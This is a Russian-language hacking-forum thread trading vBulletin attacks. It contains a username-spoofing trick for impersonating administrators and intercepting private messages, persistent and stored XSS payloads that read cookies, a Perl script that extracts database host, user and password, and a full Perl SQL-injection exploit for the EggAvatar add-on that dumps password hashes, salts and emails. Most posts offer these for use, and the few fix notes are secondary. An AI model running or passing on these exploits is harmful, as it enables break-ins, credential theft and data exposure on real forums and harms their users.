Форумы [Обзор уязвимостей vBulletin]

Discussion in 'Уязвимости CMS/форумов' started by bandera, 19 Aug 2006.

  1. RAISh

    RAISh New Member

    Joined:
    30 Apr 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    &#00
    Вот эти 4 символа после ника добавляешь, к примеру есть на форуме ник test, ты хочешь такой же, пишешь при регистрации этот ник и в конце после ника добавляешь эти символы, и всё
     
  2. delasoul

    delasoul Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    42
    Likes Received:
    5
    Reputations:
    0
    я уже таки делал и зарегилса на имя администратора но там естъ &# куда это нужна пихать вот что я не понял!!! если бы внимательно читал!! всё била бы чотко!
     
  3. RAISh

    RAISh New Member

    Joined:
    30 Apr 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Где &# это есть? Что пихать ? Ты сам понимаешь что пишешь ?
    вставляешь символы после ника и всё, если есть уязвимость, значит зарегается нормально под ником админа, а если нету, то напишет что такой пользователь существует.
    Я вот 1 не понимаю как её раскрутить уязвимость эту, к примеру залогиниться в панели админа под своим созданным ником ?
     
  4. emillord

    emillord Elder - Старейшина

    Joined:
    20 Jan 2008
    Messages:
    257
    Likes Received:
    444
    Reputations:
    255
    Это информация для админа как прикрыть дыру. Вам это не нужно.
     
    2 people like this.
  5. delasoul

    delasoul Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    42
    Likes Received:
    5
    Reputations:
    0
    4 > type &# in Censored Words section!!!!


    спасибо за ответ
     
  6. himmi

    himmi New Member

    Joined:
    29 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Type this at User Name ===> ADMIN&#00
    эта строчка для тебя если ломануть хочешь...
    а если хочешь баг убрать, то добавь эти символы в админке в исключение. чтобы юзеры не могли с этими знаками региться... ;)
     
  7. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    526
    Likes Received:
    253
    Reputations:
    32
    прав там не будет,с этой багой только ЛС будешь перехватывать.
     
  8. RAISh

    RAISh New Member

    Joined:
    30 Apr 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    и то не все сообщения
    Т.к. при отправке через страницу профиля, сообщение будет только тому отправлятся, с чьего профиля отсылают
    А если в строке ник нейма будут вводить ник, то появится оригинальный и ложный, которым ты создал, и если он выберет твой ложный ник, то придёт тебе сообщения, а так ники в списке одинаковые.
     
  9. himmi

    himmi New Member

    Joined:
    29 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    к нику присваивается id? :confused:
     
  10. GrandMaster

    GrandMaster Active Member

    Joined:
    16 May 2009
    Messages:
    107
    Likes Received:
    114
    Reputations:
    25
    https://forum.antichat.ru/thread220278.html
     
  11. SSSetuPPP

    SSSetuPPP Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    Пишет: ошибка в строке № 49

    В сплоите:
    Code:
    print"->"n;
    Может надо так?
    Code:
    print"->n";
    p.s. кавычку не туда поставил...
     
    #91 SSSetuPPP, 3 Dec 2010
    Last edited: 3 Dec 2010
  12. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1
    vBulletin 4.0.8 - Persistent XSS via Profile

    vBulletin - Persistent Cross Site Scripting via Profile​



    Versions Affected: 4.0.8 (3.8.* is not vulnerable.)

    vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the
    Profile Customization feature. If this feature is not enabled the vulnerability
    does not exist and the installation of vBulletin is thereby secure.

    Within the profile customization fields, it is possible to enter colour codes,
    rgb codes and even images. The image url() function does not sanitize user
    input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.

    [1] Private Reflected XSS:
    An attacker can inject scripts in a simple way, which is only visible to the attacker.

    Proof of Concept:
    url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />)
    (This is only visible to the attacker when he or she is logged in, and browsing his or her own profile.)

    [2] Global Reflected XSS:
    An attacker can inject malicious CSS data executing javascript, which is then visible
    to anyone browsing the user profile. Even guests visiting the malicious user profile.

    Proof of Concept: (IE6 only, may not work in IE7+ and FF)


    url(/);background:url(javascript:document.write(1337))
    url(/);width:expression(alert('www.intern0t.net'))




    Please note that some of these strings may be too long to be injected. However a
    blog entry at Exploit-DB and a video on YouTube will be released very soon.


    -:: Solution ::-
    Turn off profile customization immediately for users able to customize their profile!
    When a security patch has been provided by the vendor, enable this feature again.


    Взято с www.exploit-db.com/exploits/15550/
     
  13. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    208
    Likes Received:
    279
    Reputations:
    32
    vBulletin Version 3.8.4 AdminCP

    Стили и шаблоны-Сохранить/загрузить стили
    загружаем стиль, в поле "Название для загруженного стиля" пишем
    <script>alert (document.cookie);</script>
    когда выберем на форуме последний загруженный стиль - увидим алерт и свои куки, так же как и в админке


    Языки и фразы-Сохранить/загрузить языки
    В поле "Название загружаемого языка" пишем <script>alert (document.cookie);</script>
    "Перезаписать язык" выбираем "Создать новый"
    выбираем файл языка, загружаем
    идём по адресу http://ваш_форум и видим свои куки, алерт

    Разделы и модераторы-Добавить раздел
    в поля "Заголовок" и "Описание" пишем <script>alert (document.cookie);</script>
    нажимаем "Сохранить"
    Видим два алерта на главной, и один в админке по адресу Разделы и модераторы-Управление разделами(последний выполнился у меня в ие, в опере не было)

    Основные настройки-Основные настройки, Название сайта / Ссылка / Контактная информация
    в поле "Текст авторских прав" пишем <script>alert (document.cookie);</script>
    нажимаем сохранить
    на главной видим алерт

    Объявления-Создать новое объявление
    Раздел (будет добавлено и в подразделы) оставляем по-дефолту(Во всех разделах)
    в поле "Заголовок" и поле "Текст" вбиваем <script>alert (document.cookie);</script>
    нажимаем "Сохранить"
    Заходим в любой раздел и видим алерт

    Дополнительные поля профиля-Добавить дополнительное поле профиля
    Тип поля профиля-Текстовое поле одной строкой, нажимаем "Продолжить"
    в поле "Заголовок", "Значение по умолчанию" и "Описание" вставляем <script>alert (document.cookie);</script>
    Какая страница отображает эту опцию? выбираем то, что вам подходит. я же выбрал "Редактировать данные"
    Нажимаем "Сохранить"
    по линку http://ваш_форум/profile.php?do=editprofile видим два алерта
     
    #93 A_n_d_r_e_i, 9 Dec 2010
    Last edited: 10 Dec 2010
    1 person likes this.
  14. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    vBulletin 3.8.6 Exploit

    Code:
    #!/usr/bin/perl
    use strict;
    use LWP::Simple;
    use HTML::Parser;
    use Data::Dumper;
    my $url = shift @ARGV;
    my $line;
    die "No URL specified on command line." unless (defined $url);
    my $url2 = "$url\/install\/vbulletin-language.xml";
    my $content = get($url2); #put site html in $content.
    die "get failed" if (!defined $content);
    
    if ($content =~ m/database_ingo/) {
        $url2 = "$url\/faq.php\?s=\&do=search\&q=data\&match=all\&titlesonly=0";
        $content = get($url2);
        die "Get Failed" if (!defined $content);
        open(MYDATA, ">aaaaa.txt");
        print MYDATA $content;
        close MYDATA;
        open(NEDATA, "<aaaaa.txt");
            while($line = <NEDATA>) {
                if ($line =~ m/Host:/) {
                    $line =~ s/<span class=\"highlight\">Database\<\/span>//;
                    $line =~ s/\<br \/\>//;
                    print "$line\n";
                }
                if ($line =~ m/Username:/) {
                    $line =~ s/<span class=\"highlight\">Database<\/span>//;
                    $line =~ s/<br \/>//;
                    print "$line\n";
                }
                if ($line =~ m/Password:/) {
                    $line =~ s/<span class=\"highlight\">Database<\/span>//;
                    $line =~ s/<\/td>//;
                    print "$line\n";
                }
            }
        close NEDATA;
        unlink($url2);
    } else {
    print "Not vulnerable!\n";
    };
    _____________________________________________
    How to use?

    my $content = get($url2)

    my $content = get('http://wowcewebsite.com/path/')
    _____________________________________________*
     
  15. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    _http://www.exploit-db.com/shellcode/ сложно ведь правда поискать?
     
  16. Slay90

    Slay90 Member

    Joined:
    12 Apr 2009
    Messages:
    146
    Likes Received:
    16
    Reputations:
    -5
    foozi не пашет
    No URL specified on command line. at C:\perl\1.pl line 8.
     
  17. Mr.Br0wn

    Mr.Br0wn Banned

    Joined:
    26 Oct 2009
    Messages:
    40
    Likes Received:
    12
    Reputations:
    2
    Slay90, поправь ошибку в 8-й строке скрипта ;)
     
  18. hatecore161

    hatecore161 New Member

    Joined:
    12 Dec 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability

    PHP:
    #!/usr/bin/env perl 
    use LWP::UserAgent
    sub banner
    print 
    "###################################\n"
    print 
    "############ DSecurity ############\n"
    print 
    "###################################\n"
    print 
    "# Email:dsecurity.vn[at]gmail.com #\n"
    print 
    "###################################\n"

    if(@
    ARGV<5){ 
        print 
    "Usage: $0 address username password number_user sleeptime\n"
        print 
    "Example: $0 http://localhost/vbb test test 10 10\n"
        exit(); 

    $ua=LWP::UserAgent->new(); 
    $ua->agent("DSecurity"); 
    $ua->cookie_jar({}); 
    sub login(@){ 
        
    my $username=shift
        
    my $password=shift
        
    my $req HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login'); 
        
    $req->content_type('application/x-www-form-urlencoded'); 
        
    $req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf="); 
        
    my $res $ua->request($req); 

    sub v_request
        
    #Declare 
        
    $print $_[0]; 
        
    $select $_[1]; 
        
    $from $_[2]; 
        
    $where $_[3]; 
        
    $limit $_[4]; 
        
    $sleep $ARGV[4]; 
        if (
    $from eq '') {$from 'information_schema.tables';} 
        if (
    $where eq '') {$where '1';} 
        if (
    $limit eq '') {$limit '0';} 
        if (
    $sleep eq '') {$sleep '10';} 
          
        
    # Create a request 
        
    my $req HTTP::Request->new(POST => $ARGV[0].'/eggavatar.php'); 
        
    $req->content_type('application/x-www-form-urlencoded'); 
        
    $req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select  from  $from  WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1"); 
        
    # Pass request to the user agent and get a response back 
        
    my $res $ua->request($req); 
        
    #print $res->content; 
        
    if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/) 
            {
    $test = $3}; 
        
    sleep($sleep); 
        return 
    $print.$test."\n"

    &
    banner
    print 
    "\n#############################################################################################################\n"
    print 
    "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability                                                 #\n"
    print 
    "# Date:06-03-2011                                                                                           #\n"
    print 
    "# Author: DSecurity                                                                      #\n"
    print 
    "# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n"
    print 
    "# Version: 2.3.2                                                                                            #\n"
    print 
    "# Tested on: vBulletin 3.8.0                                                                                #\n"
    print 
    "#############################################################################################################\n"
      
    #login 
    login($ARGV[1],$ARGV[2]); 
    #Foot print 
    print v_request('MySQL version: ','@@version'); 
    print 
    v_request('Data dir: ','@@datadir'); 
    print 
    v_request('User: ','user()'); 
    print 
    v_request('Database: ','database()');   
    #Get user 
    for($i=1;$i<=$ARGV[3];$i++){ 
        print 
    "-----------------------------------------\n"
        print 
    $id v_request('ID: ','userid','user','1',$i-1); 
        if(
    $id =~ /(ID:)\s(.*)/){ 
            print 
    v_request('Group: ','usergroupid','user','userid='.$2); 
            print 
    v_request('Username: ','username','user','userid='.$2); 
            print 
    v_request('Password: ','password','user','userid='.$2); 
            print 
    v_request('Salt: ','salt','user','userid='.$2); 
            print 
    v_request('Email: ','email','user','userid='.$2); 
        } 
                  

     
     
  19. DotNet

    DotNet New Member

    Joined:
    5 Mar 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Баг с хайдом
    _ttp://ru-ua.ws/showthread.php?p=13674

    Юзать:
    http://site.ru/showthread.php?p=1&highlight=[HIDE

    Фикс:
    1. Открыть файл /includes/vS_HHR_Engine.php
    2. После
    PHP:
    <?php 
    добавить:

    PHP:
    if($_GET['highlight']){
    if(
    preg_match("/hide|hide-post|showtogroups/i"$_GET['highlight'])){
    @
    header('location: http://gay.ru');
    exit;
    }
    }
    найдено ru-ua.ws​
     
  20. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Это не фикс, юзать можно и так &highlight=[HID*
     
    1 person likes this.